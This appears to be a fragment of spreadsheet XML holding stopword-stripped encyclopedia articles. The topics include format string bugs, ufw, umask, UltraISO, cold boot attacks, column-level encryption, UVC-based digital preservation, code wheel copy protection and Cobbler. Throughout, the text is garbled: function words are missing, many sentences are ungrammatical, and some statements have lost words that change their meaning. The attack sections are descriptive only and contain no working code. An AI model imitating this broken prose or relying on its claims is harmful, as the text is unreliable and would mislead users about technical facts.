usually cannot exploited execute code attacker's choice. history format bugs first noted 1989 fuzz testing work done university wisconsin, discovered "interaction effect" shell (csh) command history mechanism error routine assumed safe string input.the format string bugs attack vector discovered september 1999 tymm twillman security audit proftpd daemon. audit uncovered snprintf directly passed user-generated data without format string. extensive tests contrived arguments printf-style functions showed privilege escalation possible. this first posting september 1999 bugtraq mailing list regarding class vulnerabilities, including basic exploit. still several months, however, security community became aware full dangers format string vulnerabilities exploits software using method began surface. first exploits brought issue common awareness providing remote root access code execution) published simultaneously bugtraq list june 2000 przemysław frasunek person using nickname tf8. they shortly followed explanation, posted person using nickname lamagra. "format bugs" posted bugtraq list pascal bouchareine july 2000. seminal paper "format string attacks" newsham published september 2000 detailed technical explanation papers published september 2001 exploiting format string vulnerabilities, team teso. prevention compilers many compilers statically check format strings produce warnings dangerous suspect formats. compiler collection, relevant compiler flags are, -wall,-wformat, -wno-format-extra-args, -wformat-security, -wformat-nonliteral, -wformat=2.most useful detecting format strings known compile-time. format string come user source external application, application must validate format string using care must also taken application generates selects format strings fly. library used, -d_fortify_source=2 parameter used detect certain types attacks occurring run-time. -wformat-nonliteral check stringent. detection contrary many security issues, root cause format string vulnerabilities relatively easy detect x86-compiled executables: printf-family functions, proper implies separate argument format string arguments formatted. faulty uses functions spotted simply counting number arguments passed function; 'argument deficiency' strong indicator function misused. detection x86-compiled binaries counting number arguments often made easy calling convention caller removes arguments pushed onto stack adding stack pointer call, simple examination stack correction yields number arguments passed printf-family function.' also cross-application scripting exploits similar kind programming error cross-site scripting printf scanf syslog improper input validation injection similar attack succeeds input filtered references further reading cowan, crispin (august 2001). formatguard: automatic protection from printf format string vulnerabilities (pdf). proceedings 10th usenix security symposium. cowan, crispin (january–february 2003), software security open-source systems, ieee security privacy, ieee computer society klein, tobias (2004). buffer overflows format-string-schwachstellen funktionsweisen, exploits gegenmaßnahmen german) ed.). dpunkt.verlag. isbn 3-89864-192-9. (vii+663 pages) seacord, robert (september 2005). secure coding c++. addison wesley. isbn 0-321-33572-4. external links introduction format string exploits 2013-05-02, alex reece scut team-teso exploiting format string vulnerabilities v1.2 2001-09-09 wasc threat classification format string attacks cert secure coding standards cert secure coding initiative known vulnerabilities mitre's project. secure programming glibc (2008), marcel holtmann</t>
  </si>
  <si>
    <t>Uncomplicated Firewall</t>
  </si>
  <si>
    <t>uncomplicated firewall (ufw) program managing netfilter firewall designed easy use. uses command-line interface consisting small number simple commands, uses iptables configuration. available default ubuntu installations 8.04 lts. guis uncomplicated firewall gufw intended easy, intuitive graphical user interface managing uncomplicated firewall. supports common tasks allowing blocking pre-configured, common p2p, individual ports. gufw designed ubuntu, also available debian-based distributions arch linux; anywhere python, available. features references external links ubuntu firewall information uncomplicated firewall ubuntu gufw official gufw website gufw community documentation</t>
  </si>
  <si>
    <t>Umask</t>
  </si>
  <si>
    <t>computing, umask command determines settings mask controls file permissions newly created files. also affect file permissions changed explicitly. umask also function sets mask, refer mask itself, formally known file mode creation mask. mask grouping bits, restricts corresponding permission newly created files. bits mask changed invoking umask command. overview unix-like systems, file attributes control read, write execute when program creates file, file permissions restricted mask. mask "1", corresponding initial file permission disabled. mask means corresponding permission determined program file system. words, mask acts last-stage filter strips away permissions file created; strips away corresponding permission. permissions changed later users programs using chmod. each program (technically called process) mask able change settings using function call. when process shell, mask umask command. when shell process launches process, child process inherits mask parent process. generally, mask affects file permissions creation files effect file permissions changed existing files; however, chmod command check mask mode options specified using symbolic mode reference class users specified. mask stored group bits. represented binary, octal symbolic notation. umask command allows mask octal (e.g. 0754) symbolic (e.g. u=,g=w,o=wx) notation. umask command used unix-like operating systems, umask function defined posix.1 specification. history mask, umask command umask function part original implementation unix. operating system evolved relatively small computer-center environment, security issue. eventually grew serve hundreds users different organizations. first, developers made creation modes files restrictive, especially cases actual security breaches, general solution. mask umask command introduced around 1978, seventh edition operating system, could allow sites, groups individuals choose defaults. mask since implemented most, all, contemporary implementations unix-like operating systems. shell command shell, mask using umask command. syntax command (the items within brackets optional.) displaying current mask umask command invoked without arguments, display current mask. output either octal symbolic notation, depending os.in shells, shell, argument (i.e. umask instruct umask display using symbolic notation. example: setting mask using octal notation umask command invoked octal argument, directly bits mask argument: fewer digits entered, leading zeros assumed. error result argument valid octal number digits. three rightmost octal digits address "owner", "group" "other" user classes respectively. fourth digit present, leftmost (high-order) digit addresses three additional attributes, setuid bit, setgid sticky bit. octal codes setting mask using symbolic notation when umask invoked using symbolic notation, modify flags specified maskexpression syntax: note syntax work using shell different behaviour built-in umask command. multiple maskexpressions separated commas. space terminates maskexpression(s). permissions applied different user classes: operator specifies permission modes mask adjusted. permission-symbols indicate file permission settings allowed prohibited mask. example: prohibit write permission user. rest flags mask unchanged. example multiple changes: this would mask would: prohibit write permission user, leaving rest flags unchanged; allow read permission enabled group, prohibiting write execute permission group; allow read permission enabled others, leaving rest flags unchanged. command line examples here examples using umask command change mask: example showing effect umask: mask effect mask applied whenever file created. mask "1", means corresponding file permission always disabled files subsequently created. mask means corresponding permission determined requesting process files subsequently created. words, mask acts last-stage filter strips away permissions file created; strips away corresponding permission file. mask applied programmatically, mask applied first negating (complementing) mask, performing logical requested file mode. [probably] first unix manual describe function, manual says, actual mode... newly-created file logical given mode complement argument. only low-order bits mask (the protection bits) participate. words, mask shows [indicates] bits turned files created. exceptions many operating systems allow file created execute permissions. environments, newly created files always execute permission disabled users. mask generally applied functions create file; however, exceptions. example, using unix versions chmod permissions file, symbolic notation used, user specified, mask applied requested permissions applied file. example: processes each process mask, applied whenever process creates file. when shell, process, spawns process, child process inherits mask parent process. when process shell, mask changed umask command. processes, process launched shell inherits shell's mask. mount option linux kernel, fat, hfs, hpfs, ntfs, file system drivers support umask mount option, controls disk information mapped permissions. this per-process mask described above, although permissions calculated similar way. some file system drivers also support separate masks files directories, using mount options fmask. also file system permissions references</t>
  </si>
  <si>
    <t>UltraISO</t>
  </si>
  <si>
    <t>ultraiso crippleware application microsoft windows creating, modifying converting image files used optical disc authoring, currently produced systems. initially ultraiso shareware however since 2006 turned commercial software. 'free trial' version limited images less, effectively making crippleware. features duplicate dvds image. create images files located cd/dvd-rom hard disk. edit existing files adding, deleting, creating files folders. create compressed zisofs (.isz) images create bootable floppy images. create bootable flash hard drive bootable disc image (works dos, windows syslinux boot sectors). this, user open image ultraiso choose 'bootable' 'write disk image' burn onto bootable disk. converts: .bin, .img, .cif, .nrg, .bwi, .daa, .dmg, .hfs formats standard image. supports 9660 levels joliet extension. optimization image file structures save disc space. capable mounting isos virtual drive. create checksums data verification isos. multiple language support. built digital audio player. supports disc format allows creation bootable disks. supports command line parameters format ultraiso uses proprietary format known isz. format advertised "iso zipped", even though simple archive. format uses zlib bzip2 compress data, aes-128,192 encryption mode (note provides integrity protection vulnerable padding oracle attack). file format specification available publicly systems's website. format supported third party applications daemon tools, alcohol 120% cdemu. also list optical disc authoring software live comparison image software references external links official website official ultraiso russian club</t>
  </si>
  <si>
    <t>Ultra Hal Assistant</t>
  </si>
  <si>
    <t>ultra assistant chatterbot intended function personal assistant. developed zabaware, inc. ultra uses natural language interface animated characters using speech synthesis. users communicate chatterbot typing speech recognition engine. utilizes wordnet lexical dictionary. name allusion 9000, artificial intelligence movie 2001: space odyssey.ultra 2007 loebner prize "most human" chatterbot. references ultra assistant tribune december 2000. future net: essential guide internet technology megatrends ensor intelligent virtual agents: international workshop, 2003 [1], computerra. external links ultra assistant webpage what chatbot? voicify.com</t>
  </si>
  <si>
    <t>Cold boot attack</t>
  </si>
  <si>
    <t>computer security, cold boot attack lesser extent, platform reset attack) type side channel attack attacker physical access computer performs memory dump computer's random-access memory (ram) performing hard reset target machine. typically, cold boot attacks used retrieving encryption keys running operating system malicious criminal investigative reasons. attack relies data remanence property dram sram retrieve memory contents remain readable seconds minutes following power switch-off.an attacker physical access running computer typically executes cold boot attack cold-booting machine booting lightweight operating system removable disk dump contents pre-boot physical memory file. attacker free analyze data dumped memory find sensitive data, keys, using various forms finding attacks. since cold boot attacks target random-access memory, full disk encryption schemes, even trusted platform module installed ineffective kind attack. this problem fundamentally hardware (insecure memory) software issue. however, malicious access prevented limiting physical access using modern techniques avoid storing sensitive data random-access memory. technical details dimm memory modules gradually lose data time lose power, immediately lose data power lost. depending temperature environmental conditions, memory modules potentially retain, least, data minutes power loss. with certain memory modules, time window attack extended hours even weeks cooling freeze spray. furthermore, bits disappear memory time, reconstructed, fade away predictable manner. consequently, attacker perform memory dump contents executing cold boot attack. ability execute cold boot attack successfully varies considerably across different systems, types memory, memory manufacturers motherboard properties, difficult carry software-based methods attack. while focus current research disk encryption, sensitive data held memory vulnerable attack.attackers execute cold boot attacks forcefully abruptly rebooting target machine booting pre-installed operating system flash drive, cd-rom network. cases practical hard reset target machine, attacker alternatively physically remove memory modules original system quickly place compatible machine attacker's control, booted access memory. further analysis performed data dumped ram. similar kind attack also used extract data memory, attack allows physical memory accessed high-speed expansion port firewire. cold boot attack preferred certain cases, high risk hardware damage. using high-speed expansion port short out, physically damage hardware certain cases. uses cold boots attacks typically used digital forensic investigations, malicious purposes theft, data recovery. digital forensics certain cases, cold boot attack used discipline digital forensics forensically preserve data contained within memory criminal evidence. example, practical preserve data memory means, cold boot attack used perform dump data contained random-access memory. example, cold boot attack used situations system secured possible access computer. cold boot attack also necessary hard disk encrypted full disk encryption disk potentially contains evidence criminal activity. cold boot attack provides access memory, provide information state system time programs running. malicious intent cold boot attack used attackers gain access encrypted information financial information trade secrets malicious intent. circumventing full disk encryption common purpose cold boot attacks circumvent software-based disk encryption. cold boot attacks used conjunction finding attacks demonstrated effective means circumventing full disk encryption schemes various vendors operating systems, even trusted platform module (tpm) secure cryptoprocessor used.in case disk encryption applications configured allow operating system boot without pre-boot entered hardware present (e.g. bitlocker simple configuration uses without two-factor authentication key), time frame attack limiting all. bitlocker bitlocker default configuration uses trusted platform module neither requires pin, external decrypt disk. when operating system boots, bitlocker retrieves tpm, without user interaction. consequently, attacker simply power machine, wait operating system begin booting execute cold boot attack machine retrieve key. this, two-factor authentication, pre-boot removable device containing startup together used work around vulnerability default bitlocker implementation. however, workaround prevent attacker retrieving sensitive data memory, retrieving encryption keys cached memory. mitigation since memory dump easily performed executing cold boot attack, storage sensitive data ram, like encryption keys full disk encryption unsafe. several solutions proposed storing encryption keys areas, random-access memory. while solutions reduce chance breaking full disk encryption, provide protection sensitive data stored memory. register-based storage solution keeping encryption keys memory register-based storage. implementations solution tresor loop-amnesia. both implementations modify kernel operating system registers tresor's case debug registers loop-amnesia's case amd64 emt64 profiling registers) used store encryption keys, rather ram. keys stored level cannot easily read userspace lost computer restarts reason. tresor loop-amnesia must on-the-fly round generation limited space available storing cryptographic tokens manner. security, disable interrupts prevent information leaking memory registers encryption decryption performed, block access debug profile registers. there potential areas modern processors storing keys: registers could effect made privileged disabling instructions (and necessarily, programs relying them), debug registers much smaller issues. proof concept distribution called 'paranoix' based register method developed. developers claim "running tresor 64-bit supports aes-ni, performance penalty compared generic implementation aes", slightly faster standard encryption despite need recalculation. primary advantage loop-amnesia compared tresor supports multiple encrypted drives; primary disadvantages lack support 32-bit worse performance cpus supporting aes-ni. cache-based storage "frozen cache" (sometimes known "cache ram"), used securely store encryption keys. works disabling cpu's cache uses storage, however, significantly degrade overall system performance point slow purposes.a similar cache-based solution proposed guan (2015) employing (write-back) cache mode keep data caches, reducing computation times public algorithms. mimosa ieee 2015 presented practical solution public-key cryptographic computations cold-boot attacks attacks. employs hardware transactional memory (htm) originally proposed speculative memory access mechanism boost performance multi-threaded applications. strong atomicity guarantee provided htm, utilized defeat illegal concurrent accesses memory space contains sensitive data. private encrypted memory protected tresor. request, private-key computation conducted within transaction: private firstly decrypted memory, decryption signing conducted. because plain-text private appears modified data transaction, read operation data abort transaction transaction roll-back initial state. note that, private encrypted initial state, result write operations decryption). currently implemented caches store-buffers, located cpus, external chips. cold-boot attacks prevented. mimosa defeats attacks attempt read sensitive data memory (including cold-boot attacks, attacks, software attacks), introduces small performance overhead. dismounting encrypted disks best practice recommends dismounting encrypted, non-system disks use, since disk encryption softwares designed securely erase keys cached memory use. this reduces risk attacker able salvage encryption keys memory executing cold boot attack. minimize access encrypted information operating system hard disk, machine completely shut reduce likelihood successful cold boot attack. however, data remain readable tens seconds several minutes depending upon physical device machine, potentially allowing data retrieved memory attacker. configuring operating system shut hibernate unused, instead using sleep mode, help mitigate risk successful cold boot attack. effective countermeasures preventing physical access typically, cold boot attack prevented limiting attacker's physical access computer making increasingly difficult carry attack. method involves soldering gluing memory modules onto motherboard, cannot easily removed sockets inserted another machine attacker's control. however, prevent attacker booting victim's machine performing memory dump using removable flash drive. mitigation uefi secure boot similar boot verification approaches effective preventing attacker booting custom software environment dump contents soldered-on main memory. full memory encryption encrypting random-access memory (ram) mitigates possibility attacker able obtain encryption keys material memory cold boot attack. this approach require changes operating system, applications, hardware. example hardware-based memory encryption implemented microsoft xbox. implementations newer x86-64 hardware available support intel forthcoming willow cove. software-based full memory encryption similar cpu-based storage since material never exposed memory, comprehensive since memory contents encrypted. general, immediate pages decrypted read operating system. implementations software-based memory encryption solutions include: commercial product privatecore. ramcrypt, kernel-patch linux kernel encrypts data memory stores encryption registers manner similar tresor.since version 1.24, veracrypt supports encryption keys passwords.more recently, several papers published highlighting availability security-enhanced commodity processors. work, cortex processor used substrate full memory encryption solution built. process segments (for example, stack, code heap) encrypted individually composition. this work marks first full memory encryption implementation general-purpose commodity processor. system provides confidentiality integrity protections code data encrypted everywhere outside boundary. secure erasure memory since cold boot attacks target unencrypted random-access memory, solution erase sensitive data memory longer use. "tcg platform reset attack mitigation specification", industry response specific attack, forces bios overwrite memory post operating system shut cleanly. however, measure still circumvented removing memory module system reading back another system attacker's control support measures.an effective secure erase feature would power interrupted, wiped less power lost conjunction secure bios hard drive/ssd controller encrypts data satax ports. contained serial presence data timings stored bios form failsafe requiring hardware change them, would nearly impossible recover data would also immune tempest attacks, man-in-the-ram possible infiltration methods.some operating systems tails provide feature securely writes random data system memory operating system shut mitigate cold boot attack. however, video memory erasure still possible 2022 still open ticket tails forum. potential attacks could exploit flaw are: generation gnupg keypair viewing private text editor could lead recovered. cryptocurrency seed could seen, therefore bypassing wallet (even encrypted) allowing access funds. typing password visibility enabled might show parts even whole key. keyfile used, could shown reduce time needed password attack. traces mounted opened encrypted volumes plausible deniability might shown, leading discovery them. connected .onion service, might shown lead discovery, whereas otherwise would extremely difficult. usage particular program could show user's patterns. instance, steganography program used opened, assumption user hiding data could made. likewise, instant messenger used, list contacts messages could shown. external storage cold boot attack prevented ensuring keys stored hardware attack. user enters disk encryption manually using enclosed fully encrypted hard disk drive encryption keys held hardware separate hard disk drive. ineffective countermeasures memory scrambling used minimize undesirable parasitic effects semiconductors feature modern intel core processors. however, scrambling used decorrelate patterns within memory contents, memory descrambled descrambling attack. hence, memory scrambling viable mitigation cold boot attacks. sleep mode provides additional protection cold boot attack data typically still resides memory state. such, full disk encryption products still vulnerable attack keys reside memory need re-entered machine resumes power state. although limiting boot device options bios make slightly less easy boot another operating system, firmware modern chipsets tends allow user override boot device post pressing specified key. limiting boot device options prevent memory module removed system read back alternative system either. addition, chipsets provide recovery mechanism allows bios settings reset default even protected password. bios settings also modified system running circumvent protections enforced memory wiping locking boot device. smartphones cold boot attack adapted carried similar manner android smartphones. since smartphones lack reset button, cold boot performed disconnecting phone's battery force hard reset. smartphone flashed operating system image perform memory dump. typically, smartphone connected attacker's machine using port. typically, android smartphones securely erase encryption keys random-access memory phone locked. this reduces risk attacker able retrieve keys memory, even succeeded executing cold boot attack phone. references external links lest remember: cold boot attacks encryption keys youtube mcgrew security's proof concept boffins freeze phone crack android on-device crypto skorobogatov, sergei (june 2002). "low temperature data remanence static ram". university cambridge. doi:10.48456/tr-536. retrieved 2008-02-27.</t>
  </si>
  <si>
    <t>Column level encryption</t>
  </si>
  <si>
    <t>column level encryption type database encryption method allows user select specific information attributes encrypted instead encrypting entire database file. understand column level encryption different encryption methods like file level encryption, disk encryption, database encryption, basic understanding encryption required. generally, data collected stored records, records appear tabular format rows database rows logging specific attributes. some data sensitive others, example, data birth, social security number, home address, etc., personal identification. order ensure private information transferred stored securely, data goes encryption, process encoding plaintext ciphertext. non-designated readers receivers able read data without decryption key. another example illustrate concept given database stores client's phone numbers. phone numbers appear readers gibberish alphanumerical text symbols, totally useless access privilege view data plaintext (original form). because stored data always sensitive important, column level encryption created allow users flexibility choosing sort attributes encrypted. this minimize performance disruption executing crypto algorithms moving data devices. application advantages technology adopted many encryption software companies around world, including ibm, mydiamo (penta security), oracle more. column level encryption store encryption like table encryption rather separate keys column. this method minimizes probability unauthorized access. advantages column-level encryption advantages column-level encryption: flexibility data encrypt. application written control when, where, whom, data viewed transparent encryption possible more secure column unique encryption within database encryption possible data active rest” retrieval speed maintained there's less encrypted data references</t>
  </si>
  <si>
    <t>UVC-based preservation</t>
  </si>
  <si>
    <t>uvc-based preservation archival strategy handling preservation digital objects. employs universal virtual computer (uvc)—a virtual machine (vm) specifically designed archival purposes, allows emulation migration language-neutral format like xml. background development approach digital preservation problem preservation digital resources paramount importance deposit libraries, research libraries, archives, government agencies, actually organizations. dominant approach digital preservation migration. migration entails making periodic transformations archived information logical formats native formats, software hardware depend becomes obsolete. notable danger migration data loss, possible loss original functionality ‘look feel’ original format. furthermore, digital migrations time consuming costly process requires converting format every document, addition copying converted streams media necessary. emulation theory jeff rothenberg caused stir organizations concerned responsible digital preservation report 1999: "avoiding technological quicksand: finding viable technical foundation digital preservation". states viable solutions ensure digital information readable future. proposed solutions relying standards migrations labeled time consuming ultimately incapable preserving digital documents original form. suggests: ideal approach provide single, extensible, long-term solution designed applied uniformly, automatically, synchrony (for example, every future refresh cycle) types documents media, minimal human intervention." proposes best satisfy criteria emulation developing emulator unknown future computers; developing techniques capture metadata needed find, access recreate document; developing techniques encapsulating documents, attendant metadata, software, emulator specifications. 2000, suggests implementing emulation-based preservation approach emulator specification expressed programs interpreted emulator specification interpreter program written emulation virtual machine. rothenberg's approach skepticism considered technically challenging, expensive time consuming, therefore economic risk (without support empirical evidence). (see reading section) concept development role raymond lorie, employment research centre almaden, initiated development uvc-based solution long-term digital preservation. describes approach ‘universal’ definition basic endure forever, ‘virtual’ never physically built ‘computer’ functionality. (nl), asset owner uvc, continues develop concept within planets project. raymond diessen responsible extending application concept preserve complex objects. role national library netherlands national library netherlands (koninklijke bibliotheek, played major role demonstrating emulation based concept viable option long-term digital preservation. 2000, emulation advocate, jeff rothenberg participated study test evaluate feasibility using emulation long-term preserving strategy. method software emulation reproduce behaviour obsolete computing platforms newer platforms offering running digital document’s original software future, thereby recreating content, behaviour, ‘look feel’ original document. rothenberg criticized trying preserve wrong thing suggesting emulate behavior hardware platforms operating systems access original data original software program associated raymond lorie recognized difficulties trying create program emulate 'real' machine future platform realised approach overkill purpose preserving digital objects. instead introduced novel approach data/program archiving using ‘universal virtual computer’. concept uvc-based preservation strategy implemented tested files part kb/ibm ‘long term preservation’ (ltp) study. creating documents complex. instead decided developing images approach would also cover documents file easily converted series images). uvc-based approach resulted permanent access tools jpeg/gif87 images within preservation subsystem kb’s e-depot. following successful implementation uvc, continued develop emulation strategy long-term digital preservation focusing 'full' hardware emulation. this approach delivered durable component-based computer emulator: dioscuri, first modular emulator digital preservation. uvc-based preservation universal virtual computer part broader concept, called uvc-based preservation method. this method allows digital objects (like text documents, spreadsheets, images, sound waves, etc.) reconstructed original appearance anytime future. methods programs written machine language universal virtual computer (uvc). completely independent architecture computer runs. program contains instructions rather physical computer. software application future platform. because know time hardware available future, must created time want access particular document repository. this forms platform programs specifically written past. creating emulation program future much simpler trying emulate 'real' machine. application description method uvc-based preservation strategy differentiates data archiving require full emulation, program archiving does. archiving data, used archive methods interpret stored data stream. methods programs written machine language universal virtual computer (uvc). program completely independent architecture computer runs. data archiving data archiving reconstructs 'look feel' original file functionality original format. electronic form document used compact storage document looks human suffices archive document image. additional functionality needed, text searching, storing image enough. case text also needs archived along image document. restoring original appearance file image future user original file looks like page layout, style, font etc. text needs exported i.e. ascii format saved sequence homogeneous elements (all presentation attributes like font, size, etc. characters) page image shows exact look page. case program data parts, decode text decode image. what entails data contained stream stored internal representation, extracted data stream, logical data elements obey certain schema certain data model. decoding algorithm (method) extracts various data elements internal representation returns tagged according schema. additional schema (schema read schemas) information schema similarly stored data together method decode schema read schemas. logical data view logical data model kept simple order minimize amount description accompanying data decrease difficulty understanding structure data. data model chosen uvc-based preservation method linearizes data elements hierarchy tagged elements organized using xml-like approach. tagged data elements extracted data stream digital file. specifies role data element plays data structure. element tags hold specific information content data technology-independent manner. furthermore, data elements tagged according schema returned client logical data view (ldv) example logical data view &lt;collection&gt; &lt;landscape&gt; &lt;name&gt; sugarloaf &lt;category&gt; mountains &lt;picture&gt; &lt;year&gt; 1916 &lt;nbr_lines&gt; 1500 &lt;dots_per_line&gt; 2100 &lt;line&gt; schema (format decoder) more information needed various data elements order humanly understand element means, information place tags hierarchy, type data (numeric, characters), together information semantics data. example, image attributes, width heights, indicating width times height pixels follow; pixels stored line line column column? colored pictures, interpret values order recreate right color? this extra information also called metadata. schema clearly application-dependent describes structure meaning tags parts specific information type. schema read schemas (logical data schema (lds)) future user gets tagged data elements, he/she generally understand meaning data relationships future user need additional information logical structure. word, schema read metadata schema needed. simple solution adopted approach method schema similar method data: schema information stored internal representation, accompanied method decode point, included archive data itself, metadata, program decode data, program decode metadata. program archiving method data archiving extended program archiving. program archiving involves archiving behavior functionality program involve archiving operating system well. archiving operating system needed program series native instructions operating system. however, operating system must archived digital object full-fledged system input/output interactions. input/output interactions needed suffices archive operating system's program. case, using similar method described above, following needs stored archiving time: program program emulates instruction sets operating system original program (i.e. software application) runs.in future interprets code yield result original program running original operating system. when input/output interactions involved things become complicated additional program mimics functioning input/output device processor must archived. this program produce input/output data structure. future mapping data structure needs written actual device. method replaces need multitude standards (one format) single standard method. that standard cover: functional specifications, interface call methods, model schema schema read schemas specification central idea uvc-based preservation digital objects preserved archive reconstructed anytime future without losing meaning object. architecture influenced characteristics real existing computer. contains memory, registers low-level instructions. architecture differs 'real' computer never physically implemented. consequently actual physical cost. core element segment-based memory. uses segments memory store distinct parts data. this segment-based design prevents allocated memory accidentally overwritten applications share memory space. conceptual model together original data possible reconstruct meaning particular digital object. seen heart system. like java virtual machine common language runtime, actually emulator allows program virtual instances necessary, usually obsolete, hardware, continue emulate necessary hardware technology continues evolve. because know time hardware available future, must created time want access particular document repository. forms platform programs specifically written run. what needs done different steps must taken archiving time (present) retrieval time (future). archiving time step define appropriate logical schema given application step choose internal representation associate program data. this part normal design application step write program data interpretation step archive schema information storing internal representation schema information stream together program decode since structure schema applications, schema read schemata chosen all. retrieval time step create emulator current platform. because simplicity concept, fairly easy skilled software developers construct emulator particular platform time step develop logical data viewer restore program restore data). this application program reads object code stream invokes emulator execute program i.e. program controls input/output interaction step write restore program restore schema. since logical view schema information fixed single restore program actually support applications. future client already knows logical view documents restored schema necessarily needs retrieving. furthermore, schema needs requested collection documents type convention convention includes information items need archived today, preserved indefinitely enable retrieval digital objects future. included convention are; architecture document interface emulator (logical data viewer) definition logical data schema (the schema read schemata)the convention must 'written stone'. saved digitally, paper and/or micrographic media. preservation system components uvc-based preservation central idea uvc-based preservation method based four different components. these are: program (format decoder) logical data schema (lds) information type description universal virtual computer logical data viewer (uvc interface) interpreter restoration programfig. components description method program decodes file format digital object. this format decoder program runs uvc, platform-independent layer, independent future hard- software changes. executing format decoder delivers element tags. these elements build logical data view (ldv) data, quite similar xml. instantiation lds, describing structure meaning tags parts specific information type. components controlled logical data viewer simply called viewer. reconstruction, viewer starts feeds data digital object format decoder running uvc. return retrieves reconstructs specific representation original object’s meaning. performance architecture relies concepts existed since beginning computer era: memory, registers basic instructions without secondary features often introduced improve execution performance. performance secondary concern programs mostly restore data work them. speed real concern either future machines much faster, emulation future machine consequently much faster. furthermore, flexibility important speed execution. even performance always still improved. implementation data archiving i.e. archiving static files, proven work operational digital archiving environment. permanent access tools images images proven successfully restore digital objects original form. application simple images functionality needed. approach develop jpeg images justified formats converted format. example, document displayed series jpeg images thereby retaining 'look feel' original digital object sacrificing functionality. furthermore, application jpeg images easily adopted emulate tiff images making small adjustment logical data schema. approach also applied objects contain behavioral aspects. example, interpreters written (partially) excel, lotus 1-2-3 pdf. however, applications handle static features formats. uvc-based emulation uvc-based emulation uses universal platform platform independent emulator built. (software program) recreates simple general purpose computer easily implemented computer platform future. with strategy future users always able access view original object. official specification must preserved preservation time. also decoders must developed specific file format required type digital object, defining object types image, sound, spreadsheet, text, etc. course original objects preserved well. complex objects/dynamic content mentioned before, uvc-based approach effectively implemented static files. technology continues developed raymond diessen (ibm) include dynamic objects exploiting communication facility program future application. alternative emulation approaches other emulation approaches stacked emulation, migrated emulation emulation virtual machine (vm). stacked emulation stacked emulation platform dependent emulation requires, time, multiple emulators running reconstruct historic platform. this brings better performance functionality lacks compatibility platforms. this approach mainly found gaming industry. migrated emulation migrated emulation involves creating platform dependent emulator must migrated (adapted) subsequent newer hosts. when particular operating system emulator created becomes obsolete, emulator translated current platform. this approach strategy high risks emulation virtual machine (evm) presented jeff rothenberg 1999 involves introducing additional layer host platform emulator said platform time independent. this approach uses virtual machine, emulator specification interpreter. said platform time independent. quite complex emulation specification needs written computer platform original software runs. specification interpreted emulation specification interpreter creates emulator platform. both interpreter created emulator evm. cost implications copyright issues copyright issues approach expected different approach. intellectual property rights exist format issue taken format owners. similarly, 'uvc-enable" applications source code required developer therefore permission owner. lastly, hardware emulation, relevant licenses software running system required. historical timeline 1995 rothenberg advocates emulation long-term preservation solution. 2000 rothenberg describes emulator virtual machine (evm) 2001 lorie presents novel approach preservation digital data, based universal virtual computer 2002 lorie reports ongoing work refining methodology building initial prototype. 2002 proof concept uvc-based preservation static files 2004 experimental stage implementing images within operational digital archive environment 2005 operational permanent access tool images 2007 inspired universal platform component library modular emulation model present (2009) continuing research extending uvc-based preservation approach complex processes also digital preservation emulator digital obsolescence file formats, transformation, migration references further reading caplan, (2008), "the preservation digital materials, chapter preservation practices", library technology reports, (2): 10–13 bearman, (1999), "reality chimeras preservation electronic records", d-lib magazine, granger, (2000), "emulation digital preservation strategy", d-lib magazine, (10), doi:10.1045/october2000-granger hendley, (1998), comparison methods costs digital preservation. british library research innovation report 106, boston spa: british library innovation centre rothenberg, (1999), avoiding technological quicksand: finding viable technical foundation digital preservation. report council library information resources rusbridge (2006), "excuse some digital preservation fallacies?", ariadne (46) hoeven, j.r., wijngaarden, h.n. (2005), "modular emulation long-term preservation strategy digital objects" (pdf), proceedings iwaw, vienna, austria [online] september 2005{{citation}}: maint: multiple names: authors list (link) external links demonstration tool freely available demonstration tool ibm. e-depot digital preservation link kb's "e-depot digital preservation" page. images short description images dioscuri software open source software individual institution would like work older digital documents planets partners short description role within planets project</t>
  </si>
  <si>
    <t>Code wheel</t>
  </si>
  <si>
    <t>code wheel type copy protection used older computer games, often published late 1980s early 1990s. evolved original "manual protection" system program would require user enter specific word manual game would start continue beyond certain point. this system popular allowed actual media backed replaced freely retaining security, increased availability photocopiers, wishing distribute games simply started copying manuals well defeat measure. although whole code wheels could directly photocopied, component wheels could disassembled individually photocopied; components could crafted together duplicate wheel. contents code wheels could also copied onto paper user unlicensed copy could simply apply mathematical formula presented challenges calculate correct response. once suitable formula found, code wheels actually made process copying easier since amount information could contain compared manual potentially unlimited size. thus, code wheels rapidly phased favor regular manual protection protection based around color, public access color photocopying time expensive uncommon. this made obsolete return protection based game media itself, cd-roms introduced. code wheel forms code wheel physical object consisting several circular sheets paper card different sizes, fastened center, creating concentric circles. game issues user challenges (symbols, words, identifiers), instruct user manipulate wheel order reveal response, single symbol word user must enter order start game. entering anything expected response would result game halting performing behaviour associated unauthorised usage software (for example, game starflight would send unbeatable "police ships" destroy player's spaceship). 2-ply simple 2-ply code wheel consisted circular sheets, challenge symbols printed intervals around rim, back sheet containing table responses printed circle, front sheet series holes allowing responses viewed, hole labelled challenge symbol. computer would present three challenge symbols, user would read response rotating front sheet first challenge symbols aligned wheel, read response hole indicated third challenge symbol. this type codewheel used large number games, neuromancer, cybercon (which used code wheel printed carbon paper). single-ply there usage single-ply code wheel, challenge symbols used; amiga game rocket ranger, player turned wheel match ranger's current location, read value hole corresponding location wanted holes simple column. since mechanism player specify wanted fly, impossible crackers remove game without destroying entire gameplay. 3-ply 3-ply code wheel, used games star control fool's errand, retained back wheel printed responses front wheel holes, added "middle" wheels front back contained mixture printed responses holes allowed next wheel show particular challenge symbols aligned external links interactive code wheels online oldgames.sk</t>
  </si>
  <si>
    <t>Cobbler (software)</t>
  </si>
  <si>
    <t>cobbler linux provisioning server facilitates automates network-based system installation multiple computer operating systems central point using services dhcp, tftp, dns. configured pxe, reinstallations, virtualized guests using xen, vmware. cobbler interacts koan program re-installation virtualization support. koan cobbler libvirt integrate different virtualization software. cobbler able manage complex network scenarios like bridging bonded ethernet link. cobbler project born michael dehaan.cobbler builds kickstart mechanism offers installation profiles applied many machines. also features integration machine installs. cobbler features dynamically change information contained kickstart template (definition), either passing variables called ksmeta using so-called snippets. example ksmeta variable could name disk device system. this could inherited system's cobbler profile. snippets dynamic python code expands limited functionality anaconda. combination profiles, ksmeta snippets gives cobbler high flexibility; complexity avoided keeping actual "code" snippets, task installation. there examples network setup disk partitioning; keeping common code snippets helps minimize size kickstart files. cobbler originally targeted rpm-based installs kickstart anaconda previously hosted part fedora project. since 2011, cobbler packaged ubuntu. since 2012, canonical used cobbler test automation openstack ubuntu.red hat's systems management application, satellite, used cobbler provisioning rhel 6.0. references external links official website</t>
  </si>
  <si>
    <t>Comparison of backup software</t>
  </si>
  <si>
